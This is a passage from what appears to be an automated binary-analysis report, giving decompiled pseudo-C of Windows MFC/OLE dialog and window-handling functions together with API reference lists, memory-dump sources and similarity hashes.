				_t200 =  *((intOrPtr*)(_t255 + 0x14));
				 *((intOrPtr*)(_t255 - 0x64)) =  *((intOrPtr*)(_t255 + 8));
				 *(_t255 - 0x80) =  *(_t255 + 0xc);
				_t238 = _t200 + 0x12;
				 *((intOrPtr*)(_t255 - 0x5c)) =  *((intOrPtr*)(_t255 + 0x20));
				 *(_t255 - 0x60) =  *(_t255 + 0x18) & 0x0000ffff;
				_t243 =  *(_t255 + 0x1c);
				 *((intOrPtr*)(_t255 - 0x7c)) = _t200;
				 *(_t255 - 0x74) =  *(_t255 + 0x24);
				 *((intOrPtr*)(_t255 - 0x50)) = _t238;
				if( *((intOrPtr*)(_t255 + 0x10)) != 0) {
					_t237 = _t200;
					 *((intOrPtr*)(_t255 - 0x24)) =  *((intOrPtr*)(_t200 + 8));
					 *((intOrPtr*)(_t255 - 0x20)) =  *((intOrPtr*)(_t200 + 4));
					 *((short*)(_t255 - 0x1c)) =  *((intOrPtr*)(_t200 + 0xc));
					 *((short*)(_t255 - 0x1a)) =  *((intOrPtr*)(_t200 + 0xe));
					 *((short*)(_t255 - 0x18)) =  *(_t200 + 0x10);
					 *((short*)(_t255 - 0x16)) =  *_t238;
					_t198 =  *((intOrPtr*)(_t200 + 0x14));
					_t200 = _t255 - 0x24;
					 *((short*)(_t255 - 0x14)) = _t198;
					 *((intOrPtr*)(_t255 - 0x7c)) = _t200;
					 *((intOrPtr*)(_t255 - 0x50)) = _t237 + 0x18;
				}
				_t141 =  *((short*)(_t200 + 8));
				_t239 =  *((short*)(_t200 + 0xa));
				 *(_t255 - 0x34) = _t141;
				 *(_t255 - 0x30) = _t239;
				 *((intOrPtr*)(_t255 - 0x2c)) =  *((short*)(_t200 + 0xc)) + _t141;
				 *((intOrPtr*)(_t255 - 0x28)) =  *((short*)(_t200 + 0xe)) + _t239;
				MapDialogRect( *( *((intOrPtr*)(_t255 - 0x64)) + 0x20), _t255 - 0x34);
				 *(_t255 - 0x68) =  *(_t255 - 0x68) & 0x00000000;
				_t250 =  *((intOrPtr*)(_t255 - 0x5c));
				if(_t250 >= 4) {
					_t191 =  *_t243;
					_t250 = _t250 - 4;
					_t243 =  &(_t243[1]);
					 *(_t255 - 0x58) = _t191;
					 *((intOrPtr*)(_t255 - 0x5c)) = _t250;
					if(_t191 != 0) {
						__imp__#4(_t243, _t191);
						_t235 =  *(_t255 - 0x58);
						 *(_t255 - 0x68) = _t191;
						_t243 = _t243 + _t235 * 2;
						_t250 = _t250 - _t235 + _t235;
						 *((intOrPtr*)(_t255 - 0x5c)) = _t250;
					}
				}
				 *(_t255 - 0x4c) =  *(_t255 - 0x4c) & 0x00000000;
				E01261AE0(_t255 - 0x54, _t243, _t250, E0126811C());
				 *((intOrPtr*)(_t255 - 4)) = 0;
				 *(_t255 - 0x6c) = 0;
				 *(_t255 - 0x78) = 0;
				 *(_t255 - 0x58) = 0;
				_t148 =  *(_t255 - 0x60);
				if(_t148 == 0x37a || _t148 == 0x37b) {
					_t209 =  *_t243;
					_t243 =  &(_t243[3]);
					 *(_t255 - 0x84) = _t209;
					_t210 = _t209 + 0xfffffff4;
					if(_t210 == 0) {
						L17:
						_t250 = _t250 -  *(_t255 - 0x84);
						 *(_t255 - 0x60) = _t148 + 0xfffc;
						goto L18;
					}
					_t254 =  *(_t255 - 0x4c);
					do {
						_t204 =  *_t243;
						_t181 = _t243[1] & 0x0000ffff;
						_t243 =  &(_t243[1]);
						 *(_t255 - 0x4c) = _t181;
						 *((intOrPtr*)(_t255 - 0x70)) = _t210 - 6;
						if(_t204 != 0x80010001) {
							_t182 = E01262C72(__eflags, 0x1c);
							 *((intOrPtr*)(_t255 - 0x88)) = _t182;
							 *((char*)(_t255 - 4)) = 1;
							__eflags = _t182;
							if(_t182 == 0) {
								_t254 = 0;
								__eflags = 0;
							} else {
								_t239 =  *(_t255 - 0x4c);
								_t254 = E01277206(_t182, _t254, _t204,  *(_t255 - 0x4c));
							}
							_t210 =  *((intOrPtr*)(_t255 - 0x70));
							 *((char*)(_t255 - 4)) = 0;
						} else {
							 *(_t255 - 0x78) =  *_t243;
							_t245 =  &(_t243[4]);
							 *(_t255 - 0x58) = _t243[1];
							E012627DE(_t204, _t255 - 0x54, _t254, _t245);
							_t239 =  *(_t255 - 0x4c);
							_t232 =  *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x54)) - 0xc));
							_t243 =  &(_t245[0]) + _t232;
							_t188 = 0xffffffef;
							_t210 =  *((intOrPtr*)(_t255 - 0x70)) + _t188 - _t232;
							 *(_t255 - 0x6c) =  *(_t255 - 0x4c) & 0x0000ffff;
						}
					} while (_t210 != 0);
					_t200 =  *((intOrPtr*)(_t255 - 0x7c));
					_t148 =  *(_t255 - 0x60);
					 *(_t255 - 0x4c) = _t254;
					_t250 =  *((intOrPtr*)(_t255 - 0x5c));
					goto L17;
				} else {
					L18:
					_t150 =  *((intOrPtr*)(_t255 - 0x50));
					_push(_t255 - 0x44);
					_push(_t150);
					_t267 =  *_t150 - 0x7b;
					if( *_t150 != 0x7b) {
						__imp__CLSIDFromProgID();
					} else {
						__imp__CLSIDFromString();
					}
					_push(0);
					_push(_t250);
					_push(_t243);
					 *((intOrPtr*)(_t255 - 0x50)) = _t150;
					E01274B5B(_t200, _t255 - 0xb4, _t243, _t250, _t267);
					_t244 =  *(_t255 - 0x60);
					 *((char*)(_t255 - 4)) = 2;
					asm("sbb esi, esi");
					 *(_t255 - 0x48) =  *(_t255 - 0x48) & 0x00000000;
					_t253 =  ~( *(_t255 - 0x60) - 0x00000378 & 0x0000ffff) & _t255 - 0x000000b4;
					_t268 =  *((intOrPtr*)(_t255 - 0x50));
					if( *((intOrPtr*)(_t255 - 0x50)) < 0) {
						L25:
						_t202 = 1;
						__eflags = 1;
						goto L26;
					} else {
						_push("true");
						if(E01276B29( *((intOrPtr*)(_t255 - 0x64)), _t239, _t244, _t253, _t268) == 0) {
							goto L25;
						}
						_t170 = E01275FBA( *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x64)) + 0x68)), _t244 - 0x377, 0, _t255 - 0x44, 0,  *_t200, _t255 - 0x34,  *(_t200 + 0x10) & 0x0000ffff, _t253, 0 | _t244 == 0x00000377,  *(_t255 - 0x68), _t255 - 0x48);
						_t202 = 1;
						if(_t170 != 0) {
							E01279595( *(_t255 - 0x48), 1);
							SetWindowPos( *( *(_t255 - 0x48) + 0x24),  *(_t255 - 0x80), 0, 0, 0, 0, 0x13);
							 *( *(_t255 - 0x48) + 0x94) =  *(_t255 - 0x4c);
							E0126379B( *(_t255 - 0x48) + 0xa4, _t255 - 0x54);
							 *((short*)( *(_t255 - 0x48) + 0x98)) =  *(_t255 - 0x6c);
							 *( *(_t255 - 0x48) + 0x9c) =  *(_t255 - 0x78);
							 *( *(_t255 - 0x48) + 0xa0) =  *(_t255 - 0x58);
						}
						L26:
						_t155 =  *(_t255 - 0x68);
						if(_t155 != 0) {
							__imp__#6(_t155);
						}
						_t156 =  *(_t255 - 0x48);
						_t214 =  *(_t255 - 0x74);
						_t273 = _t156;
						if(_t156 == 0) {
							 *_t214 =  *_t214 & 0x00000000;
							_t202 = 0;
							__eflags = 0;
						} else {
							 *_t214 =  *(_t156 + 0x24);
						}
						 *((char*)(_t255 - 4)) = 0;
						E01274BB7(_t202, _t255 - 0xb4, _t239, _t244, _t253, _t273);
						E012615E0( *((intOrPtr*)(_t255 - 0x54)) + 0xfffffff0, _t239);
						return E01285B5C(_t202, _t244, _t253);
					}
				}
			}






























                                                                                                                0x01265e77
                                                                                                                0x01265e81
                                                                                                                0x01265e8d
                                                                                                                0x01265e90
                                                                                                                0x01265e96
                                                                                                                0x01265e9c
                                                                                                                0x01265ea5
                                                                                                                0x01265eab
                                                                                                                0x01265eae
                                                                                                                0x01265eb1
                                                                                                                0x01265eb4
                                                                                                                0x01265eb7
                                                                                                                0x01265eba
                                                                                                                0x01265ebf
                                                                                                                0x01265ec1
                                                                                                                0x01265ec7
                                                                                                                0x01265ece
                                                                                                                0x01265ed6
                                                                                                                0x01265ede
                                                                                                                0x01265ee8
                                                                                                                0x01265eec
                                                                                                                0x01265ef0
                                                                                                                0x01265ef3
                                                                                                                0x01265ef7
                                                                                                                0x01265efa
                                                                                                                0x01265efa
                                                                                                                0x01265efd
                                                                                                                0x01265f05
                                                                                                                0x01265f0f
                                                                                                                0x01265f17
                                                                                                                0x01265f1e
                                                                                                                0x01265f21
                                                                                                                0x01265f27
                                                                                                                0x01265f2d
                                                                                                                0x01265f31
                                                                                                                0x01265f37
                                                                                                                0x01265f39
                                                                                                                0x01265f3b
                                                                                                                0x01265f3e
                                                                                                                0x01265f41
                                                                                                                0x01265f44
                                                                                                                0x01265f49
                                                                                                                0x01265f4d
                                                                                                                0x01265f53
                                                                                                                0x01265f56
                                                                                                                0x01265f59
                                                                                                                0x01265f5e
                                                                                                                0x01265f60
                                                                                                                0x01265f60
                                                                                                                0x01265f49
                                                                                                                0x01265f63
                                                                                                                0x01265f70
                                                                                                                0x01265f7c
                                                                                                                0x01265f7f
                                                                                                                0x01265f82
                                                                                                                0x01265f85
                                                                                                                0x01265f88
                                                                                                                0x01265f8e
                                                                                                                0x01265f9a
                                                                                                                0x01265f9c
                                                                                                                0x01265f9f
                                                                                                                0x01265fa5
                                                                                                                0x01265fa8
                                                                                                                0x01266044
                                                                                                                0x01266044
                                                                                                                0x0126604f
                                                                                                                0x00000000
                                                                                                                0x0126604f
                                                                                                                0x01265fae
                                                                                                                0x01265fb1
                                                                                                                0x01265fb1
                                                                                                                0x01265fb6
                                                                                                                0x01265fba
                                                                                                                0x01265fbd
                                                                                                                0x01265fc0
                                                                                                                0x01265fc9
                                                                                                                0x01266002
                                                                                                                0x01266008
                                                                                                                0x0126600e
                                                                                                                0x01266012
                                                                                                                0x01266014
                                                                                                                0x01266027
                                                                                                                0x01266027
                                                                                                                0x01266016
                                                                                                                0x01266016
                                                                                                                0x01266023
                                                                                                                0x01266023
                                                                                                                0x01266029
                                                                                                                0x0126602c
                                                                                                                0x01265fcb
                                                                                                                0x01265fd0
                                                                                                                0x01265fd6
                                                                                                                0x01265fda
                                                                                                                0x01265fdd
                                                                                                                0x01265fe6
                                                                                                                0x01265feb
                                                                                                                0x01265fee
                                                                                                                0x01265ff0
                                                                                                                0x01265ff6
                                                                                                                0x01265ffb
                                                                                                                0x01265ffb
                                                                                                                0x01266030
                                                                                                                0x01266038
                                                                                                                0x0126603b
                                                                                                                0x0126603e
                                                                                                                0x01266041
                                                                                                                0x00000000
                                                                                                                0x01266052
                                                                                                                0x01266052
                                                                                                                0x01266052
                                                                                                                0x01266058
                                                                                                                0x01266059
                                                                                                                0x0126605a
                                                                                                                0x0126605e
                                                                                                                0x01266068
                                                                                                                0x01266060
                                                                                                                0x01266060
                                                                                                                0x01266060
                                                                                                                0x0126606e
                                                                                                                0x01266070
                                                                                                                0x01266071
                                                                                                                0x01266078
                                                                                                                0x0126607b
                                                                                                                0x01266080
                                                                                                                0x0126608b
                                                                                                                0x0126609d
                                                                                                                0x0126609f
                                                                                                                0x012660a3
                                                                                                                0x012660a5
                                                                                                                0x012660a9
                                                                                                                0x01266161
                                                                                                                0x01266163
                                                                                                                0x01266163
                                                                                                                0x00000000
                                                                                                                0x012660af
                                                                                                                0x012660b2
                                                                                                                0x012660bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012660f0
                                                                                                                0x012660f7
                                                                                                                0x012660fa
                                                                                                                0x01266100
                                                                                                                0x01266116
                                                                                                                0x01266122
                                                                                                                0x01266135
                                                                                                                0x01266140
                                                                                                                0x0126614d
                                                                                                                0x01266159
                                                                                                                0x01266159
                                                                                                                0x01266164
                                                                                                                0x01266164
                                                                                                                0x01266169
                                                                                                                0x0126616c
                                                                                                                0x0126616c
                                                                                                                0x01266172
                                                                                                                0x01266175
                                                                                                                0x01266178
                                                                                                                0x0126617a
                                                                                                                0x01266183
                                                                                                                0x01266186
                                                                                                                0x01266186
                                                                                                                0x0126617c
                                                                                                                0x0126617f
                                                                                                                0x0126617f
                                                                                                                0x0126618e
                                                                                                                0x01266192
                                                                                                                0x0126619d
                                                                                                                0x012661a9
                                                                                                                0x012661a9
                                                                                                                0x012660a9

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 01265E81
                                                                                                                • MapDialogRect.USER32(?,00000000), ref: 01265F27
                                                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 01265F4D
                                                                                                                  • Part of subcall function 01262C72: _malloc.LIBCMT ref: 01262C8E
                                                                                                                • CLSIDFromString.OLE32(?,?,00000000), ref: 01266060
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000), ref: 01266068
                                                                                                                  • Part of subcall function 01274BB7: __EH_prolog3.LIBCMT ref: 01274BBE
                                                                                                                • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,00000000,?,00000000), ref: 01266116
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0126616C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: String$From$AllocDialogFreeH_prolog3H_prolog3_ProgRectWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1768163721-0
                                                                                                                • Opcode ID: 6d5f1653cc6b7513949887145db93e989cc2bd0c7c6ce3cc4c2f42bd180bfee4
                                                                                                                • Instruction ID: b6db420661488f3ab43cd28b1e065deb3e622d1dce7f1ef425f509141c4b6954
                                                                                                                • Opcode Fuzzy Hash: 6d5f1653cc6b7513949887145db93e989cc2bd0c7c6ce3cc4c2f42bd180bfee4
                                                                                                                • Instruction Fuzzy Hash: CEB1F575E1021A9FDF14DFA8C984AADBBB9FF48310F144169E919AB385E7309981CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10067BC0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 213COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10067D22
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Exception@8Throw
                                                                                                                • String ID: exceeds the maximum of $ is less than the minimum of $: IV length
                                                                                                                • API String ID: 2005118841-1273958906
                                                                                                                • Opcode ID: 3962d0b495af43e0b3ef92113689e0ace86fedeae55de760806c69f6e9955e55
                                                                                                                • Instruction ID: c4cbea45335ff46e19036a2cfbff18f73dbb5ece0b381019ab275a7fd3567c0b
                                                                                                                • Opcode Fuzzy Hash: 3962d0b495af43e0b3ef92113689e0ace86fedeae55de760806c69f6e9955e55
                                                                                                                • Instruction Fuzzy Hash: EA814E75608384AFD731DB64C845FDBBBE9EF89350F00491AF989D3241EB35A8048BA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126C003, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E0126C003(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr* _a8) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v28;
				intOrPtr _v32;
				signed int _v48;
				struct HWND__* _v52;
				struct HWND__* _v56;
				intOrPtr _v60;
				void* _v64;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				long _t61;
				long _t63;
				long* _t69;
				struct HWND__* _t74;
				signed int _t83;
				signed int _t85;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr* _t94;
				void* _t95;
				intOrPtr* _t100;
				signed int _t102;
				signed int _t103;
				intOrPtr* _t116;
				void* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				signed int _t125;
				void* _t127;
				signed int _t128;
				void* _t131;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t113 = __edx;
				_t93 = __ebx;
				_t116 = _a8;
				_t122 = __ecx;
				_t137 =  *_t116 - 1;
				if( *_t116 != 1) {
					__eflags = E0126B3CD(__ebx, __ecx, __edx, _t116,  *((intOrPtr*)(__ecx + 0x20)),  *((intOrPtr*)(_t116 + 4)), "true");
					if(__eflags == 0) {
						goto L10;
					} else {
						_push(0);
						_t51 = E0126D578(__ebx, _t50, _t116, __eflags);
						__eflags = _t51;
						if(_t51 == 0) {
							goto L10;
						}
					}
					goto L11;
				} else {
					_push(E01266D6E);
					_t100 = E01270689(__ebx, 0x13881a4, _t116, __ecx, _t137);
					if(_t100 == 0) {
						L12:
						E01268275(_t100);
						asm("int3");
						_t131 = _t133;
						_t134 = _t133 - 0xc;
						_push(_t122);
						_t124 = _t100;
						_v28 = _v12;
						_push(E01266D6E);
						_v32 = _v8;
						_t56 = E01270689(_t93, 0x13881a4, _t116, _t124, __eflags);
						__eflags = _t56;
						if(_t56 == 0) {
							E01268275(0x13881a4);
							asm("int3");
							_push(_t131);
							_t132 = _t134;
							_t58 =  *0x12aa3f0; // 0xddd5d539
							_v48 = _t58 ^ _t132;
							_push(_t93);
							_push(_t124);
							_push(_t116);
							_t94 = 0x13881a4;
							_t125 = E01266B46();
							__eflags = _t125;
							if(_t125 != 0) {
								__eflags =  *((intOrPtr*)(_t125 + 0x20)) - 0x13881a4;
								if(__eflags == 0) {
									__eflags =  *((char*)(E012692A5(0x13881a4, 0, _t125, __eflags) + 0x14));
									if(__eflags == 0) {
										__eflags = _t125 -  *((intOrPtr*)(E012692A5(0x13881a4, 0, _t125, __eflags) + 4));
										if(__eflags != 0) {
											L19:
											_push(0);
											E01263A17();
										} else {
											_t83 = E01270D58(0x13881a4, __eflags);
											__eflags = _t83;
											if(_t83 != 0) {
												goto L19;
											}
										}
									}
									 *((intOrPtr*)(_t125 + 0x20)) = 0;
								}
								__eflags =  *((intOrPtr*)(_t125 + 0x24)) - _t94;
								if( *((intOrPtr*)(_t125 + 0x24)) == _t94) {
									 *((intOrPtr*)(_t125 + 0x24)) = 0;
								}
							}
							_t102 =  *(_t94 + 0x64);
							__eflags = _t102;
							if(_t102 != 0) {
								 *((intOrPtr*)( *_t102 + 0x50))();
								 *(_t94 + 0x64) = 0;
							}
							_t103 =  *(_t94 + 0x68);
							__eflags = _t103;
							if(_t103 != 0) {
								 *((intOrPtr*)( *_t103 + 4))("true");
							}
							__eflags =  *(_t94 + 0x58) & 0x00000001;
							 *(_t94 + 0x68) = 0;
							if(__eflags != 0) {
								_t128 =  *(E012692D8(_t94, _t103, 0, _t125, __eflags) + 0x3c);
								__eflags = _t128;
								if(_t128 != 0) {
									__eflags =  *(_t128 + 0x20);
									if( *(_t128 + 0x20) != 0) {
										E01283870( &_v64, 0, 0x30);
										_t74 =  *(_t94 + 0x20);
										_v56 = _t74;
										_v52 = _t74;
										_v64 = 0x2c;
										_v60 = 1;
										SendMessageA( *(_t128 + 0x20), 0x405, 0,  &_v64);
									}
								}
							}
							_t61 = GetWindowLongA( *(_t94 + 0x20), 0xfffffffc);
							E0126B107(_t94, _t94);
							_t63 = GetWindowLongA( *(_t94 + 0x20), 0xfffffffc);
							__eflags = _t63 - _t61;
							if(_t63 == _t61) {
								_t69 =  *((intOrPtr*)( *_t94 + 0xfc))();
								__eflags =  *_t69;
								if( *_t69 != 0) {
									SetWindowLongA( *(_t94 + 0x20), 0xfffffffc,  *_t69);
								}
							}
							E0126B193(_t94, _t94);
							 *((intOrPtr*)( *_t94 + 0x120))();
							_pop(_t120);
							_pop(_t127);
							__eflags = _v16 ^ _t132;
							_pop(_t95);
							return E012833E5(_t95, _v16 ^ _t132, _t113, _t120, _t127);
						} else {
							_t85 =  *((intOrPtr*)(_t56 + 0x5c)) - 0x132;
							__eflags = _t85;
							_v12 = _t85;
							return  *((intOrPtr*)( *_t124 + 0x114))(0x19, 0,  &_v20);
						}
					} else {
						_t139 =  *((intOrPtr*)(_t100 + 0x74)) -  *((intOrPtr*)(_t122 + 0x20));
						if( *((intOrPtr*)(_t100 + 0x74)) !=  *((intOrPtr*)(_t122 + 0x20))) {
							_t100 = _t122;
							_t90 =  *((intOrPtr*)( *_t122 + 0x6c))();
						} else {
							_t90 = E012696A0(__ebx, _t100, __edx, _t116, _t122, _t139,  *((intOrPtr*)(_t100 + 0x78)));
						}
						if(_t90 == 0) {
							goto L12;
						} else {
							_push( *((intOrPtr*)(_t116 + 8)));
							_t91 = E0126DD56(_t100, _t113, _t90);
							if(_t91 != 0) {
								 *((intOrPtr*)( *_t91 + 0x10))(_t116);
							}
							L10:
							_t51 = E0126B107(_t93, _t122);
							L11:
							return _t51;
						}
					}
				}
			}












































                                                                                                                0x0126c003
                                                                                                                0x0126c003
                                                                                                                0x0126c008
                                                                                                                0x0126c00b
                                                                                                                0x0126c00d
                                                                                                                0x0126c010
                                                                                                                0x0126c068
                                                                                                                0x0126c06a
                                                                                                                0x00000000
                                                                                                                0x0126c06c
                                                                                                                0x0126c06c
                                                                                                                0x0126c070
                                                                                                                0x0126c075
                                                                                                                0x0126c077
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126c077
                                                                                                                0x00000000
                                                                                                                0x0126c012
                                                                                                                0x0126c012
                                                                                                                0x0126c021
                                                                                                                0x0126c025
                                                                                                                0x0126c086
                                                                                                                0x0126c086
                                                                                                                0x0126c08b
                                                                                                                0x0126c08d
                                                                                                                0x0126c08f
                                                                                                                0x0126c095
                                                                                                                0x0126c096
                                                                                                                0x0126c098
                                                                                                                0x0126c0a3
                                                                                                                0x0126c0a8
                                                                                                                0x0126c0ab
                                                                                                                0x0126c0b0
                                                                                                                0x0126c0b2
                                                                                                                0x0126c0d8
                                                                                                                0x0126c0dd
                                                                                                                0x0126c0de
                                                                                                                0x0126c0df
                                                                                                                0x0126c0e4
                                                                                                                0x0126c0eb
                                                                                                                0x0126c0ee
                                                                                                                0x0126c0ef
                                                                                                                0x0126c0f0
                                                                                                                0x0126c0f1
                                                                                                                0x0126c0f8
                                                                                                                0x0126c0fc
                                                                                                                0x0126c0fe
                                                                                                                0x0126c100
                                                                                                                0x0126c103
                                                                                                                0x0126c10a
                                                                                                                0x0126c10e
                                                                                                                0x0126c115
                                                                                                                0x0126c118
                                                                                                                0x0126c123
                                                                                                                0x0126c123
                                                                                                                0x0126c124
                                                                                                                0x0126c11a
                                                                                                                0x0126c11a
                                                                                                                0x0126c11f
                                                                                                                0x0126c121
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126c121
                                                                                                                0x0126c118
                                                                                                                0x0126c129
                                                                                                                0x0126c129
                                                                                                                0x0126c12c
                                                                                                                0x0126c12f
                                                                                                                0x0126c131
                                                                                                                0x0126c131
                                                                                                                0x0126c12f
                                                                                                                0x0126c134
                                                                                                                0x0126c137
                                                                                                                0x0126c139
                                                                                                                0x0126c13d
                                                                                                                0x0126c140
                                                                                                                0x0126c140
                                                                                                                0x0126c143
                                                                                                                0x0126c146
                                                                                                                0x0126c148
                                                                                                                0x0126c14e
                                                                                                                0x0126c14e
                                                                                                                0x0126c151
                                                                                                                0x0126c155
                                                                                                                0x0126c158
                                                                                                                0x0126c15f
                                                                                                                0x0126c162
                                                                                                                0x0126c164
                                                                                                                0x0126c166
                                                                                                                0x0126c169
                                                                                                                0x0126c172
                                                                                                                0x0126c177
                                                                                                                0x0126c17d
                                                                                                                0x0126c180
                                                                                                                0x0126c186
                                                                                                                0x0126c197
                                                                                                                0x0126c19e
                                                                                                                0x0126c19e
                                                                                                                0x0126c169
                                                                                                                0x0126c164
                                                                                                                0x0126c1af
                                                                                                                0x0126c1b5
                                                                                                                0x0126c1bf
                                                                                                                0x0126c1c1
                                                                                                                0x0126c1c3
                                                                                                                0x0126c1c9
                                                                                                                0x0126c1cf
                                                                                                                0x0126c1d2
                                                                                                                0x0126c1db
                                                                                                                0x0126c1db
                                                                                                                0x0126c1d2
                                                                                                                0x0126c1e3
                                                                                                                0x0126c1ec
                                                                                                                0x0126c1f5
                                                                                                                0x0126c1f6
                                                                                                                0x0126c1f7
                                                                                                                0x0126c1f9
                                                                                                                0x0126c202
                                                                                                                0x0126c0b4
                                                                                                                0x0126c0ba
                                                                                                                0x0126c0ba
                                                                                                                0x0126c0c0
                                                                                                                0x0126c0d5
                                                                                                                0x0126c0d5
                                                                                                                0x0126c027
                                                                                                                0x0126c02a
                                                                                                                0x0126c02d
                                                                                                                0x0126c03b
                                                                                                                0x0126c03d
                                                                                                                0x0126c02f
                                                                                                                0x0126c032
                                                                                                                0x0126c032
                                                                                                                0x0126c042
                                                                                                                0x00000000
                                                                                                                0x0126c044
                                                                                                                0x0126c044
                                                                                                                0x0126c048
                                                                                                                0x0126c04f
                                                                                                                0x0126c056
                                                                                                                0x0126c056
                                                                                                                0x0126c079
                                                                                                                0x0126c07b
                                                                                                                0x0126c080
                                                                                                                0x0126c083
                                                                                                                0x0126c083
                                                                                                                0x0126c042
                                                                                                                0x0126c025

                                                                                                                APIs
                                                                                                                  • Part of subcall function 01270689: __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                • _memset.LIBCMT ref: 0126C172
                                                                                                                • SendMessageA.USER32(?,00000405,00000000,?), ref: 0126C19E
                                                                                                                • GetWindowLongA.USER32 ref: 0126C1AF
                                                                                                                • GetWindowLongA.USER32 ref: 0126C1BF
                                                                                                                • SetWindowLongA.USER32 ref: 0126C1DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$H_prolog3MessageSend_memset
                                                                                                                • String ID: ,
                                                                                                                • API String ID: 3067979629-3772416878
                                                                                                                • Opcode ID: 0aeab8c9b95cf70a8b04e8d31b8988e0110ead754840edaf26739e224db3b4fb
                                                                                                                • Instruction ID: f29a01d96aec52c06f7ce5a0db6c18f750b5ec068abadb3eb465f4f15e667034
                                                                                                                • Opcode Fuzzy Hash: 0aeab8c9b95cf70a8b04e8d31b8988e0110ead754840edaf26739e224db3b4fb
                                                                                                                • Instruction Fuzzy Hash: 7651B330621206EFDF25BF69C844A6EBBADFF59710F1001A9EA45DB2D1DB71D890CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127C59E, Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E0127C59E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t95;
				signed int _t100;
				signed int _t102;
				intOrPtr* _t107;
				signed int _t112;
				signed int _t119;
				void* _t121;
				void* _t122;
				void* _t123;

				_push(0x6c);
				E01285B7A(E01298097, __ebx, __edi, __esi);
				_t121 = __ecx;
				_t102 = 0;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				_t119 = 0;
				 *(_t122 - 0x14) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L19:
					 *(_t121 + 0x44) =  *(_t121 + 0x44) & 0x00000000;
					return E01285B48(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t112 = _t119 * 0x28;
					 *(_t122 - 0x24) = _t112;
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x14)) + _t112 + 0x24));
					if(_t72 == 0) {
						goto L18;
					}
					_t73 =  *((intOrPtr*)(_t72 + 4));
					 *((intOrPtr*)(_t122 - 0x1c)) = _t73;
					if(_t73 == 0) {
						goto L18;
					}
					_t100 = _t102 << 4;
					do {
